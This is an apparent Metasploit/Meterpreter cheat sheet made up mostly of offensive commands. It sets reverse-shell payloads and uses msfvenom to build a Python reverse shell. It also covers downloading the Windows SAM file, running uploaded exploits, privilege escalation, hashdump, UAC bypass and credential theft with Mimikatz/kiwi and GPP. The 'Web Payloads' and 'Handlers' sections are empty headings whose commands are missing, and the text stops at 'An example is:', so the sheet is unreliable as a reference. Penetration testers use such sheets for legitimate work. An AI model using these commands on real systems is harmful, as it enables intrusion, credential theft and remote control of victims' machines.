๐ŸฎMeterpreter Cheat Sheet

Windows reverse meterpreter payload

  • set payload windows/meterpreter/reverse_tcp
    • Windows reverse tcp payload

Windows VNC Meterpreter payload

  • set payload windows/vncinject/reverse_tcp
    • Meterpreter Windows VNC Payload

  • set ViewOnly false

Linux Reverse Meterpreter payload

  • set payload linux/meterpreter/reverse_tcp
    • Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

  • upload file c:\\windows
    • Meterpreter upload file to Windows target

  • download c:\\windows\\repair\\sam /tmp
    • Meterpreter download file from Windows target

  • execute -f c:\\windows\\temp\\exploit.exe
    • Meterpreter run .exe on target, handy for executing uploaded exploits

  • execute -f cmd -c
    • Creates new channel with cmd shell

  • ps
    • Meterpreter show processes

  • shell
    • Meterpreter get shell on the target

  • getsystem
    • Meterpreter attempts privilege escalation on the target

  • hashdump
    • Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)

  • portfwd add -l 3389 -p 3389 -r target
    • Meterpreter create port forward to target machine

  • portfwd delete -l 3389 -p 3389 -r target
    • Meterpreter delete port forward

  • use exploit/windows/local/bypassuac
    • Bypass UAC on Windows 7; set target and arch (x86/x64)

  • use auxiliary/scanner/http/dir_scanner
    • Metasploit HTTP directory scanner

  • use auxiliary/scanner/http/jboss_vulnscan
    • Metasploit JBOSS vulnerability scanner

  • use auxiliary/scanner/mssql/mssql_login
    • Metasploit MSSQL Credential Scanner

  • use auxiliary/scanner/mysql/mysql_version
    • Metasploit MySQL version scanner

  • use auxiliary/scanner/oracle/oracle_login
    • Metasploit Oracle Login Module

  • use exploit/multi/script/web_delivery
    • Metasploit powershell payload delivery module

  • post/windows/manage/powershell/exec_powershell
    • Metasploit upload and run powershell script through a session

  • use exploit/multi/http/jboss_maindeployer
    • Metasploit JBOSS deploy

  • use exploit/windows/mssql/mssql_payload
    • Metasploit MSSQL payload

  • run post/windows/gather/win_privs
    • Metasploit show privileges of current user

  • use post/windows/gather/credentials/gpp
    • Metasploit grab GPP saved passwords

  • load kiwi
  • creds_all
    • Metasploit load Mimikatz/kiwi and get creds

  • run post/windows/gather/local_admin_search_enum
    • Identify other machines that the supplied domain user has administrative access to

  • set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

    • List options

Binaries

Web Payloads

    • PHP

    • Listener

    • PHP

    • ASP

    • JSP

    • WAR

Scripting Payloads

  • msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

    • Python

    • Bash

    • Perl

Shellcode

For all shellcode, see `msfvenom --help-formats` for the valid output formats and parameters. Msfvenom emits the shellcode in the chosen language's syntax so it can be cut and pasted directly into your exploit.

Handlers

Metasploit handlers are the quickest way to put Metasploit in a position to receive your incoming shells. Handlers should be in the following format.

An example is:
